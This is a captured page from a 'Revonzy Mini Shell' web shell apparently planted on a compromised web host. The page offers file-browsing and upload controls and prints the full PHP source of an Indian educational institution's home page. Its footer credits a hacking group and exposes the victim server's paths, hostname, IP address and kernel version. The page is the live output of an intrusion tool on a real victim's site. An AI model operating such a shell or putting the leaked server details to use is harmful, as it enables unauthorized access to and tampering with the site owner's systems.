Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/inde

<?php
	require_once("admin/lib/functions.php");
	$db = new login_function();

	// $staff_details	=	$db->get_teaching_staff();
?>
<!DOCTYPE HTML>
<html>
<head>
<title></title>
<link href="css/style.css" rel="stylesheet" type="text/css" media="all" />


<link rel="stylesheet" type="text/css" href="css/stylesheet.css"/>
<script src="js/jquery-1.7.min.js"></script>
<script src="js/jquery.easing.1.3.js"></script>
<script src="js/tms-0.4.1.js"></script>
   
	<style>
	
	
.zoomin img 
{ 
margin-left:240px;
 height: 200px; width: 200px;
 -webkit-transition: all 2s ease; -moz-transition: all 2s ease;
 -ms-transition: all 2s ease; 
 transition: all 2s ease;
 }
.zoomin img:hover {
 width: 300px;
 height: 300px;
 }
 @-webkit-keyframes swinging{
    0%{-webkit-transform: rotate(10deg);}
    50%{-webkit-transform: rotate(-5deg)}
    100%{-webkit-transform: rotate(10deg);}
}
 
@keyframes swinging{
    0%{transform: rotate(10deg);}
    50%{transform: rotate(-5deg)}
    100%{transform: rotate(10deg);}
}
 
.swingimage{
    -webkit-transform-origin: 50% 0;
    transform-origin: 50% 0;
    -webkit-animation: swinging 3.5s ease-in-out forwards infinite;
    animation: swinging 3.5s ease-in-out forwards infinite;
}
.element {
  height:200px;
  width: 200px;
  margin: 0 auto;
 
  animation-name: stretch;
  animation-duration: 1.5s; 
  animation-timing-function: ease-out; 
  animation-delay: 0;
  animation-direction: alternate;
  animation-iteration-count: infinite;
  animation-fill-mode: none;
  animation-play-state: running;
}

@keyframes stretch {
  0% {
    transform: scale(.3);
    
    border-radius: 100%;
  }
  5% {
    
  }
  20% {
    transform: scale(1.5);
    
  }
}
</style>

</head>
<body>
	<?php
		require_once("lib/header.php");
	?>
	
	<style>
	#slideshow {
  margin: 80px auto;
  position: relative;
  width: 1080px;
  height: 440px;
  padding: 10px;
  box-shadow: 0 0 20px rgba(0, 0, 0, 0.4);
  margin:auto;
  z-index:0;
}

#slideshow > div {
  position: absolute;
  top: 10px;
  left: 10px;
  right: 10px;
  bottom: 10px;
  z-index:0;
}
.img_slide_n
{
	width:1080px;
	z-index:0;
}
.img_slide_n img{
	width:1080px;
	height:100%;
	z-index:0;
}
</style>
<script>
$("#slideshow > div:gt(0)").hide();

setInterval(function() {
  $('#slideshow > div:first')
    .fadeOut(1000)
    .next()
    .fadeIn(1000)
    .end()
    .appendTo('#slideshow');
}, 3000)
</script>

<div class="main_container" style="min-height:1400px;background-color:white;">
	
	<div id="slideshow">
		 <?php
				
				$slider_img = $db->get_all_slider_images();
				if(!empty($slider_img))
				{	
					$counter = 0; 
					foreach($slider_img as $record)
					{
						$id 	= $slider_img[$counter][0];
						$images = $slider_img[$counter][1];
						$title	= $slider_img[$counter][2];
			?>
				<div class="img_slide_n">
					<img src="slider_images/<?php echo $images;?>">
					<?php
						if($title!="")
						{
					?>
						<div style="position:relative; margin-top:-30px; width:99%; color:#FFFFFF; background-color:#666666; padding:7px;"><?php echo $title; ?></div>
					<?php
						}
					?>
			   </div>			   
			 <?php
				$counter ++;
					}
				}else
				{
				?>
				<td colspan="4">No Data Found...</td>
				<?php
				}   
			 ?>  
	
	
	  
	  
	</div>
	<marquee style="background-color:#FFFFFF; padding:5px; margin-bottom:-5px;" behavior="scroll" direction="left" onmouseover="this.stop();" onmouseout="this.start();" scrollamount="7">
			<?php
				$details = $db->get_all_new_and_events_images();
				$counter = 0;
				if(!empty($details))
				{
					foreach($details as $record)
					{
						$id 		= $details[$counter][0];
						$title   	= $details[$counter][1];
						$image	 	= $details[$counter][2];
				?>
						<a href="/gallery/<?php echo $image; ?>" target="_blank" style="color:; margin-left:15px;"><img src="/images/newicon.gif" /><?php echo $title; ?></a>
				<?php
						$counter ++;
					}
				}
			?>
		</marquee>
	
	
	
	
	


		
		<div class="page_highlighter" style="background-color:orange;">Home</div>	
		

			
			<?php
				require_once("highlights.php");
			?>

			<div class="data_container" style="margin-top:16px;">
			    
			    
	<style>
	    th
	    {
	        color:#FFFFFF;
	        text-align:center;
	    }
	    .mn_pg_title
	    {
	        color:#0070C0;
	        font-weight:bold;
	    }
	    td
	    {
	        text-align:left !important;
	        font-size:14px;
	        color:#333333;
	    }
	</style>
	
	<h4 class="mn_pg_title">Quantitative Metrics:</h4>
	<br />
    <table class="table table-bordered">
    <thead style="background-color:#0070C0">
      <tr>
        <th width="65">Sr. No.</th>
        <th width="150">Criterion</th>
        <th width="300">Metric   Question</th>
        <th width="70">Link</th>
      </tr>
    </thead>
    <tbody>
<tr>
	<td>1</td><td>Citerion – I</td><td>Curricular Aspects</td><td><a href="ssr.php?chapter=1">Click</a></td>
</tr>
<tr>
	<td>2</td><td>Criterion –  II</td><td>Teaching, Learning and Evaluation</td><td><a href="ssr.php?chapter=2">Click</a></td>
</tr>
<tr>
	<td>3</td><td>Criterion – III</td><td>Research, Innovations and Extension</td><td><a href="ssr.php?chapter=3">Click</a></td>
</tr>
<tr>
	<td>4</td><td>Criterion – IV</td><td>Infrastructure and Learning Resources</td><td><a href="ssr.php?chapter=4">Click</a></td>
</tr>
<tr>
	<td>5</td><td>Criterion – V</td><td>Student Support and Progression</td><td><a href="ssr.php?chapter=5">Click</a></td>
</tr>
<tr>
	<td>6</td><td>Criterion – VI</td><td>Governance, Leadership and Management</td><td><a href="ssr.php?chapter=6">Click</a></td>
</tr>
<tr>
	<td>7</td><td>Criterion – VII</td><td>Institutional Values and Best Practices</td><td><a href="ssr.php?chapter=7">Click</a></td>
</tr>


    </tbody>
  </table>
			    
    <br /><br />
		  
		  

		  
			    
				<!---<span class="tab_title" style="border-bottom:1px solid #DFDFDF;">Moto</span>
				
				<img src="/img/moto.jpg" class="icons_imgs" />
				
				<p id="mission">
					"Education through self-help."
				</p>-->
					
				<!--<div class="col_1_of_12 span_1_of_12">
			<div class="title-img"><span class="title-desc" style="color:black;border-bottom:0px;font-size:20px;color:white">Vision</span>
			<div class="clear"></div>
			</div>
			</div>
			 
				
			   <p id="mission" style="margin-left:180px">	
			   "    Quality education to all especially rural, socially & economically deprived students to make them self-reliant 
    i.e., women empowerment through education."
				</p>
				
				
				
				
					<br /><br /><br /><br />
					
				<div class="col_1_of_12 span_1_of_12">
			<div class="title-img2"><span class="tiltle-desc" style="color:black;border-bottom:0px;font-size:20px;color:white">Mission</span>
			<div class="clear"></div>
			</div>
			</div>
				
				<p id="mission" style="margin-left:200px;">
					"Women empowerment & excellence through quality education."
				</p>
			</div>-->
		</div>
		
		<?php
		require_once("lib/footer.php");
	?>
	    </body>
</html>

    	
    	

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4